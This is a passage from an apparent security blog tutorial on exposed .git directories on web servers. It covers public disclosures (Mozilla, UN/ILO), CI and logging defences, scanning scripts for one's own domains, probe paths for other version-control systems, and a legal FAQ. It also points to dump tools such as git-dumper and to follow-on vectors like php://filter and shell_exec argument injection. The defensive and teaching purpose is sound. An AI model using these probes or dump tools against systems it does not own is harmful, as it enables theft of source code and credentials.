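        print(f"VCS metadata in artifact: {hit}")
    return 1 if hits else 0
```

In a pipeline step you would unpack the artifact and finish with something like `sys.exit(gate("artifact/"))`, where the directory name is whatever your build uses.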

Layer 3: Audit your own externally-facing properties

Run the detection script across everything you own. It is one minute of work and surfaces the bug before someone else does:

bash

for host in $(cat my-domains.txt); do
  ./detect.sh "https://$host"
done

The detect.sh from the lab works as-is. Feed it every domain on your registrar account, every staging host, every old microsite nobody has touched in three years. Old, forgotten properties are where this bug lives most reliably. The same forgotten-asset blind spot is what feeds the Meow attack that wipes exposed databases for no reason: an internet-reachable thing nobody is watching gets found and ruined by a bot before any human notices it is open.

What `git-dumper` and `GitTools` do that this article does not

The reference scripts above are intentionally minimal. The production tools add things that matter in real engagements:

Brute-forcing common ref paths and filenames. Real repos have refs/heads/feature/*, refs/tags/*, refs/remotes/origin/* that my fixed list of known files misses.
Concurrent fetching. A single-threaded walk through a 10k-object repo over the internet is slow. Real tools fan out 10-50 requests in parallel.
Pack-file handling. Repos that have been git gc'd store most objects inside .pack files instead of as loose objects. My reference dumpers fetch objects/info/packs and any .pack files it references, but they do not extract objects from the pack file, they let the local git binary do that. git-dumper handles pack-file parsing natively.
Retry + rate-limiting. Anything serving real traffic is going to throttle a flood of .git/objects/aa/bbbb... requests. Production tools back off.

For a real engagement, use git-dumper. For learning what git-dumper is doing, the reference scripts above are under 200 lines each and dependency-free.
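On the pack-file point: even if you leave the unpacking to a real git binary, it is worth sanity-checking a downloaded .pack before you trust it. A pack starts with a fixed 12-byte header: the signature PACK, a 4-byte big-endian version number, and a 4-byte big-endian object count. The sketch below reads just that header; the function name is mine.

```python
import struct


def parse_pack_header(data: bytes) -> tuple[int, int]:
    """Return (version, object_count) from the first 12 bytes of a .pack file."""
    if len(data) < 12:
        raise ValueError("too short to be a pack file")
    # 4-byte signature, then two unsigned 32-bit integers in network byte order.
    magic, version, count = struct.unpack(">4sII", data[:12])
    if magic != b"PACK":
        raise ValueError("missing PACK signature (error page or truncated download?)")
    return version, count
```

The object count is also a useful progress indicator: it tells you how many objects the repository has tucked away in that pack, which on a gc'd production repo is most of them.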

Real-world disclosures

Two public examples where this exact bug had real impact on real organisations:

Mozilla Bugzilla #1509328 (2018). A researcher reported "source code disclosure due to publicly available .git endpoint" on surveillance.mozilla.org/.git. The bug warned that the full source could be fetched with GitTools; it was triaged and resolved as a duplicate of an earlier related bug. A Mozilla-operated infrastructure host running the same anti-pattern this article documents.
United Nations / ILO / UNEP (January 2021). Sakura Samurai found an exposed .git/ on an ILO (International Labour Organization) subdomain. Inside the recovered repository were credentials to a private GitHub organisation tied to the UN Environment Programme; via those credentials they reached private repos and database credentials and ultimately surfaced over 100,000 UNEP employee records. The initial foothold was the two-request probe documented earlier in this article. Public writeup and timeline at johnjhacking.com/blog/unep-breach/.

The shape is the same in both: someone deployed a checkout, the dotfile directory came along, an external researcher found it before the asset owner did. Mozilla resolved it as a duplicate (the bug had already been reported elsewhere on their infrastructure); the UN case produced a six-figure PII exposure off a single subdomain's exposed git history. The technique is not novel; the impact is what the bounty programmes (and the headlines) are responding to.

The same deploy-hygiene mistake hits every version-control system, not just git. The detection probes are different, the impact is identical:

VCS	Detection probe	Notes
Subversion	`/.svn/wc.db`, `/.svn/entries`	SQLite database since SVN 1.7; older repos have plain-text `entries` files
Mercurial	`/.hg/store/00manifest.i`, `/.hg/requires`	Less common in modern deployments but still found on legacy installs
Bazaar	`/.bzr/branch-format`, `/.bzr/checkout/format`	Rare; Bazaar usage has collapsed since 2017
Filesystem metadata	`/.DS_Store`	macOS-only, not a VCS, but the same kind of unintentional leak; reveals every filename in the deploying developer's working directory

The fix layer is the same: deny dotfile directories at the web server, do not deploy from a working tree, scan deploy artifacts in CI before shipping.

Where to go next

PHP filter source disclosure is the parallel attack against PHP applications that exposes source code through php://filter/convert.base64-encode. Same outcome (source code in your hands), different vector.
Argument injection: once you have the source, the next most common payoff is finding a passthru() / shell_exec() call that takes user input directly. The source disclosure tells you exactly which parameter to target.
The web application security vulnerabilities taxonomy covers where source-code disclosure sits among the other classes of bugs you should be probing for in the same audit.
The techearl-labs source-code-disclosure directory has all four scripts, the lab setup, and the README; clone it and try it against your own WordPress.

Does this work on private repos hosted on GitHub or GitLab?

No. This attack only works when a web server in front of a deployed checkout is serving the .git/ directory as static files. GitHub and GitLab serve repos through their own application code (the smart HTTP protocol, with authentication), not as a raw filesystem. You cannot fetch github.com/user/repo/.git/HEAD and get anything useful; GitHub returns a 404 or routes you to the rendered repo page. The vulnerability lives at the deploy boundary, where someone copied a working tree to a webroot.

Does removing the .git directory after the fact help?

It stops new dumps and does nothing about historical exposure. Any attacker who already dumped the repo has it, and no single log line will tell you whether anyone did, because every individual GET looks like a legitimate static-file request; only the aggregate pattern gives a dump away. If you find .git/ exposed on a production server, the right response is: rotate every credential that was ever committed (treat them all as compromised), audit your access logs for sustained 200 responses to /.git/objects/* paths from a single user-agent (the IOC for a dump in progress), and then remove the directory. Removing the directory alone is denial.
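The log audit described above can be sketched in a few lines of Python. This is an assumption-laden example, not the lab's tooling: it assumes the common "combined" access-log layout, groups by client IP plus user-agent, and uses a hypothetical threshold of 50 object fetches, all of which you would adjust to your own logs.

```python
import re
from collections import Counter

# Matches the common "combined" access-log layout (an assumption);
# adjust the pattern if your server uses a custom log format.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def find_dump_candidates(lines, threshold=50):
    """Count 200 responses under /.git/objects/ per (client IP, user-agent).

    Returns only the clients at or above the (hypothetical) threshold.
    """
    hits = Counter()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        if m["status"] == "200" and m["path"].startswith("/.git/objects/"):
            hits[(m["ip"], m["ua"])] += 1
    return {client: n for client, n in hits.items() if n >= threshold}
```

Pass it an open log file (or any iterable of lines). A single stray request will not trip it; a client that pulled dozens of loose objects will.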

What about .svn, .hg, .bzr? Same attack?

Yes, same shape. Subversion's .svn/wc.db, Mercurial's .hg/store/, and Bazaar's .bzr/ all encode the full repository state and all have the same deploy-hygiene problem. The detection probes are different (/.svn/entries, /.hg/store/00manifest.i, /.bzr/branch-format) but the underlying mistake, shipping the VCS metadata directory to production, is identical. CWE-527 covers all of them.

Is this still a problem in 2026 or have most platforms fixed it?

Still rampant. Apache's default vhost still does not deny dotfile directories; you have to add the rule yourself. nginx's default config does not either; the popular nginx WordPress recipes most tutorials copy-paste have a deny rule for .ht* (for .htaccess / .htpasswd) but not for .git. Neither of the two major control panels (cPanel, Plesk) adds a .git rule unless you ask. The bug rides on the absence of an opt-in rule, not the presence of a misconfiguration, which is exactly the failure mode that does not get fixed at scale. I find one or more in nearly every WordPress audit I run, and the large-scale public scans of the web that get posted every year or so consistently point the same way: this is not a long-tail bug, it is very much current.

How do I scan a large portfolio for this without hammering my own infra?

Two HEAD requests per host (one to /.git/HEAD, one to /.git/config) are enough to confirm or rule out exposure. That is nothing: a thousand hosts is 2,000 requests spread across whatever rate your scanner runs at. The detect.sh in the lab does GET (because it needs the body to pattern-match) but the same logic works with HEAD if you only care about the status code, at the cost of a small false-positive rate from servers that return 200 for HEAD on paths that 404 on GET. For very large portfolios I run a single-shot scanner that does HEAD-only against /.git/HEAD across the full asset list, then GET-confirms the hits.
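The HEAD-first, GET-confirm approach could look roughly like the sketch below. It is not the scanner I run, just a minimal illustration: `http_fetch` and `scan` are hypothetical names, HTTPS on the default port is assumed, there is no rate limiting or concurrency, and the `ref: refs/` check will miss a detached HEAD that contains a bare commit hash.

```python
import urllib.error
import urllib.request


def http_fetch(method, url, timeout=5):
    """Return (status, first bytes of body); status 0 means the request failed."""
    req = urllib.request.Request(url, method=method)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(256)
    except urllib.error.HTTPError as err:
        return err.code, b""
    except (urllib.error.URLError, OSError):
        return 0, b""


def scan(hosts, fetch=http_fetch):
    """HEAD-probe /.git/HEAD on every host, then GET-confirm only the 200s."""
    exposed = []
    for host in hosts:
        url = f"https://{host}/.git/HEAD"
        status, _ = fetch("HEAD", url)
        if status != 200:
            continue  # cheap first pass: most hosts drop out here
        status, body = fetch("GET", url)
        # Confirm on content so that HEAD-only 200s and soft 404s are discarded.
        if status == 200 and body.startswith(b"ref: refs/"):
            exposed.append(host)
    return exposed
```

The `fetch` parameter is injectable so the logic can be exercised against canned responses before it is pointed at a real asset list, for example `scan(["www.example.com"])` against a host you own.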

Will a WAF block this?

Cloudflare's default WAF rules do not block /.git/HEAD specifically; there is no signature that would distinguish 'attacker probing for an exposed .git' from 'CI tool fetching a deploy hook'. Some commercial WAFs (Imperva, F5) have dotfile-path rules in their default policies that block /.git/, /.svn/, /.hg/ on principle, which is the correct default. If your WAF does not, you can add the rule yourself in a few minutes. Two important caveats: a WAF rule is defence in depth on top of the web server config (do both, not either-or), and the rule has to sit at the WAF layer rather than the origin layer. A rule that only fires on traffic that has already reached origin does not help if a CDN cache in front has already served the file once.

What is the legal exposure of running the dump scripts?

Same as any unauthenticated probing of a target you do not own. detect.sh issues two GETs and consumes a handful of bytes of bandwidth, which is defensible as a 'web request' under most computer-misuse statutes, the same as accidentally typing the URL in a browser. The full dump is different: thousands of requests, downloading the entire source tree of a system you do not own, with clear intent. That is unauthorised access in every jurisdiction I have looked at, and the script's user-agent string identifying itself does not change that. Run the full dump only against targets you own or have written permission to test. Bug-bounty programmes with formally-scoped engagement letters are fine; cold-probing a stranger's WordPress is not.


Ishan Karunaratne


